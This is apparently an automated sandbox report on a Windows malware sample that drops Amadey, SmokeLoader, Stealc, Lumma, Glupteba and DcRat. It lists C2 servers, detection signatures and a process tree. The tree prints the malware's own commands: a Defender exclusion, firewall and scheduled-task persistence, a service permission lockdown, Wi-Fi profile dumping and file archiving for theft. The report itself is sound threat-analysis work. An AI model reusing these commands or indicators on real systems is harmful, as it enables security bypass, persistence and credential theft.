Analysis

  • max time kernel
    300s
  • max time network
    301s
  • platform
    windows10-1703_x64
  • resource
    win10-20240214-en
  • resource tags

    arch:x64arch:x86image:win10-20240214-enlocale:en-usos:windows10-1703-x64system
  • submitted
    25-03-2024 04:55

General

  • Target

    68896184a0a231f1b18342108f0d9489d452fe49054a694ab3c191a07ddc432f.exe

  • Size

    1.8MB

  • MD5

    f1911ac059309245915628965e4fdbfc

  • SHA1

    ae7156458b7ad36e0e5c57069383fb0728a811f7

  • SHA256

    68896184a0a231f1b18342108f0d9489d452fe49054a694ab3c191a07ddc432f

  • SHA512

    20eec5f655559129bc5dd5556e837e9aab8984dae5a7a45a427f1ed1878311c4826672b3f6a78185ff4f245851879984d42a94efd390b53eb203d2cfef806e88

  • SSDEEP

    49152:L6PX2tSZN/uBiZz2Wcgudz6uM+c+q4GlQP0H:L6PX2tSqBigFc+UlQc

Malware Config

Extracted

Family

amadey

Version

4.18

C2

http://193.233.132.56

Attributes
  • install_dir

    09fd851a4f

  • install_file

    explorha.exe

  • strings_key

    443351145ece4966ded809641c77cfa8

  • url_paths

    /Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

amadey

Version

4.12

C2

http://185.172.128.19

Attributes
  • install_dir

    cd1f156d67

  • install_file

    Utsysc.exe

  • strings_key

    0dd3e5ee91b367c60c9e575983554b30

  • url_paths

    /ghsdh39s/index.php

rc4.plain

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

stealc

C2

http://185.172.128.209

Attributes
  • url_path

    /3cd2b41cbde8fc9c.php

Extracted

Family

smokeloader

Version

2022

C2

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32
rc4.i32

Extracted

Family

lumma

C2

https://resergvearyinitiani.shop/api

https://associationokeo.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • DcRat 23 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect ZGRat V1 1 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 2 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs 7 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 11 IoCs
  • Downloads MZ/PE file
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 18 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 7 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 6 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 47 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • Checks SCSI registry key(s) 3 TTPs 32 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 20 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 29 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 52 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • c:\windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2940
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
          PID:4136
      • C:\Users\Admin\AppData\Local\Temp\68896184a0a231f1b18342108f0d9489d452fe49054a694ab3c191a07ddc432f.exe
        "C:\Users\Admin\AppData\Local\Temp\68896184a0a231f1b18342108f0d9489d452fe49054a694ab3c191a07ddc432f.exe"
        1⤵
        • DcRat
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:220
        • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
          "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
          2⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4748
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
            3⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1328
            • C:\Windows\system32\rundll32.exe
              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
              4⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:5020
              • C:\Windows\system32\netsh.exe
                netsh wlan show profiles
                5⤵
                  PID:3780
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\356371483166_Desktop.zip' -CompressionLevel Optimal
                  5⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3368
            • C:\Users\Admin\AppData\Local\Temp\1000022001\faff4047ca.exe
              "C:\Users\Admin\AppData\Local\Temp\1000022001\faff4047ca.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              PID:2896
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
              3⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              PID:4680
            • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
              "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              PID:2272
            • C:\Users\Admin\AppData\Local\Temp\1000035001\lumma21.exe
              "C:\Users\Admin\AppData\Local\Temp\1000035001\lumma21.exe"
              3⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              PID:4132
        • C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
          C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
          1⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:4044
          • C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe
            "C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4980
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN boom8.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe" /F
              3⤵
              • DcRat
              • Creates scheduled task(s)
              PID:4644
            • C:\Users\Admin\AppData\Local\Temp\1000172001\ISetup8.exe
              "C:\Users\Admin\AppData\Local\Temp\1000172001\ISetup8.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4596
              • C:\Users\Admin\AppData\Local\Temp\u3jo.0.exe
                "C:\Users\Admin\AppData\Local\Temp\u3jo.0.exe"
                4⤵
                • Blocklisted process makes network request
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                PID:1384
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\KKJKFBKKEC.exe"
                  5⤵
                    PID:1300
                    • C:\Users\Admin\AppData\Local\Temp\KKJKFBKKEC.exe
                      "C:\Users\Admin\AppData\Local\Temp\KKJKFBKKEC.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:5904
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\KKJKFBKKEC.exe
                        7⤵
                          PID:780
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 2.2.2.2 -n 1 -w 3000
                            8⤵
                            • Runs ping.exe
                            PID:4884
                  • C:\Users\Admin\AppData\Local\Temp\u3jo.1.exe
                    "C:\Users\Admin\AppData\Local\Temp\u3jo.1.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:3688
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4416
                      • C:\Windows\SysWOW64\chcp.com
                        chcp 1251
                        6⤵
                          PID:5084
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                          6⤵
                          • DcRat
                          • Creates scheduled task(s)
                          PID:3172
                  • C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub1.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub1.exe"
                    3⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    PID:4208
                  • C:\Users\Admin\AppData\Local\Temp\1000174001\4767d2e713f2021e8fe856e3ea638b58.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000174001\4767d2e713f2021e8fe856e3ea638b58.exe"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:776
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3936
                    • C:\Users\Admin\AppData\Local\Temp\1000174001\4767d2e713f2021e8fe856e3ea638b58.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000174001\4767d2e713f2021e8fe856e3ea638b58.exe"
                      4⤵
                      • DcRat
                      • Windows security bypass
                      • Executes dropped EXE
                      • Windows security modification
                      • Adds Run key to start application
                      • Checks for VirtualBox DLLs, possible anti-VM trick
                      • Drops file in Windows directory
                      • Modifies data under HKEY_USERS
                      PID:4368
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        5⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3184
                      • C:\Windows\System32\cmd.exe
                        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                        5⤵
                          PID:520
                          • C:\Windows\system32\netsh.exe
                            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                            6⤵
                            • Modifies Windows Firewall
                            PID:1028
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          5⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4020
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          5⤵
                          • Drops file in System32 directory
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4416
                        • C:\Windows\rss\csrss.exe
                          C:\Windows\rss\csrss.exe
                          5⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Manipulates WinMonFS driver.
                          • Drops file in Windows directory
                          PID:2300
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            6⤵
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3612
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                            6⤵
                            • DcRat
                            • Creates scheduled task(s)
                            PID:1192
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /delete /tn ScheduledUpdate /f
                            6⤵
                              PID:5740
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              6⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5432
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              6⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              PID:5464
                            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                              6⤵
                              • Executes dropped EXE
                              PID:4372
                            • C:\Windows\SYSTEM32\schtasks.exe
                              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                              6⤵
                              • DcRat
                              • Creates scheduled task(s)
                              PID:5476
                            • C:\Windows\windefender.exe
                              "C:\Windows\windefender.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:5932
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                7⤵
                                  PID:5996
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                    8⤵
                                    • Launches sc.exe
                                    PID:2760
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                        2⤵
                        • Loads dropped DLL
                        PID:4344
                        • C:\Windows\system32\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                          3⤵
                          • Blocklisted process makes network request
                          • Loads dropped DLL
                          PID:3148
                          • C:\Windows\system32\netsh.exe
                            netsh wlan show profiles
                            4⤵
                              PID:2524
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\356371483166_Desktop.zip' -CompressionLevel Optimal
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2352
                        • C:\Users\Admin\AppData\Local\Temp\1000085001\file300un.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000085001\file300un.exe"
                          2⤵
                          • DcRat
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of SetThreadContext
                          PID:3012
                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
                            3⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1408
                          • C:\Windows\system32\cmd.exe
                            "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\.BLRVzdv\svchost.exe"' & exit
                            3⤵
                              PID:3784
                              • C:\Windows\system32\schtasks.exe
                                schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\.BLRVzdv\svchost.exe"'
                                4⤵
                                • DcRat
                                • Creates scheduled task(s)
                                PID:4200
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4584
                              • C:\Users\Admin\Pictures\FesRJ0LZ5TuyxbLlv4j6F8tO.exe
                                "C:\Users\Admin\Pictures\FesRJ0LZ5TuyxbLlv4j6F8tO.exe"
                                4⤵
                                • Executes dropped EXE
                                PID:3192
                                • C:\Users\Admin\AppData\Local\Temp\u2go.0.exe
                                  "C:\Users\Admin\AppData\Local\Temp\u2go.0.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  PID:5656
                                • C:\Users\Admin\AppData\Local\Temp\u2go.1.exe
                                  "C:\Users\Admin\AppData\Local\Temp\u2go.1.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:6052
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                                    6⤵
                                      PID:5604
                                      • C:\Windows\SysWOW64\chcp.com
                                        chcp 1251
                                        7⤵
                                          PID:5424
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                          7⤵
                                          • DcRat
                                          • Creates scheduled task(s)
                                          PID:3968
                                  • C:\Users\Admin\Pictures\Oux3HN1pXYBrlBSyUhURwZtW.exe
                                    "C:\Users\Admin\Pictures\Oux3HN1pXYBrlBSyUhURwZtW.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:3012
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                      5⤵
                                        PID:4676
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                        5⤵
                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                        PID:4460
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 648
                                          6⤵
                                          • Program crash
                                          PID:3920
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 668
                                          6⤵
                                          • Program crash
                                          PID:5248
                                    • C:\Users\Admin\Pictures\reGFIfdvbHsXdtT53reuGrj5.exe
                                      "C:\Users\Admin\Pictures\reGFIfdvbHsXdtT53reuGrj5.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      PID:4700
                                      • C:\Users\Admin\AppData\Local\Temp\u3mk.0.exe
                                        "C:\Users\Admin\AppData\Local\Temp\u3mk.0.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        PID:4984
                                      • C:\Users\Admin\AppData\Local\Temp\u3mk.1.exe
                                        "C:\Users\Admin\AppData\Local\Temp\u3mk.1.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:5748
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                                          6⤵
                                            PID:5904
                                            • C:\Windows\SysWOW64\chcp.com
                                              chcp 1251
                                              7⤵
                                                PID:5880
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                                7⤵
                                                • DcRat
                                                • Creates scheduled task(s)
                                                PID:3152
                                        • C:\Users\Admin\Pictures\B8xmAbYiKvW48fzfvWYitgnb.exe
                                          "C:\Users\Admin\Pictures\B8xmAbYiKvW48fzfvWYitgnb.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          PID:1320
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            5⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5084
                                          • C:\Users\Admin\Pictures\B8xmAbYiKvW48fzfvWYitgnb.exe
                                            "C:\Users\Admin\Pictures\B8xmAbYiKvW48fzfvWYitgnb.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Checks for VirtualBox DLLs, possible anti-VM trick
                                            PID:4856
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              6⤵
                                              • Drops file in System32 directory
                                              • Modifies data under HKEY_USERS
                                              PID:6048
                                        • C:\Users\Admin\Pictures\UJr5dVCKeFo24GpWRyIZ7MJJ.exe
                                          "C:\Users\Admin\Pictures\UJr5dVCKeFo24GpWRyIZ7MJJ.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          PID:1452
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            5⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5956
                                          • C:\Users\Admin\Pictures\UJr5dVCKeFo24GpWRyIZ7MJJ.exe
                                            "C:\Users\Admin\Pictures\UJr5dVCKeFo24GpWRyIZ7MJJ.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Checks for VirtualBox DLLs, possible anti-VM trick
                                            PID:5020
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              6⤵
                                              • Drops file in System32 directory
                                              • Modifies data under HKEY_USERS
                                              PID:5336
                                        • C:\Users\Admin\Pictures\c7766j4gRGD41yO0R9Za2kVs.exe
                                          "C:\Users\Admin\Pictures\c7766j4gRGD41yO0R9Za2kVs.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          PID:2880
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            5⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:6044
                                          • C:\Users\Admin\Pictures\c7766j4gRGD41yO0R9Za2kVs.exe
                                            "C:\Users\Admin\Pictures\c7766j4gRGD41yO0R9Za2kVs.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Checks for VirtualBox DLLs, possible anti-VM trick
                                            PID:3884
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              6⤵
                                              • Drops file in System32 directory
                                              • Modifies data under HKEY_USERS
                                              PID:5800
                                        • C:\Users\Admin\Pictures\x9x6GlDYA69bSYKoEslox6Nt.exe
                                          "C:\Users\Admin\Pictures\x9x6GlDYA69bSYKoEslox6Nt.exe" --silent --allusers=0
                                          4⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Enumerates connected drives
                                          • Modifies system certificate store
                                          PID:5128
                                          • C:\Users\Admin\Pictures\x9x6GlDYA69bSYKoEslox6Nt.exe
                                            C:\Users\Admin\Pictures\x9x6GlDYA69bSYKoEslox6Nt.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.40 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6d4a21f8,0x6d4a2204,0x6d4a2210
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:5224
                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\x9x6GlDYA69bSYKoEslox6Nt.exe
                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\x9x6GlDYA69bSYKoEslox6Nt.exe" --version
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:5384
                                          • C:\Users\Admin\Pictures\x9x6GlDYA69bSYKoEslox6Nt.exe
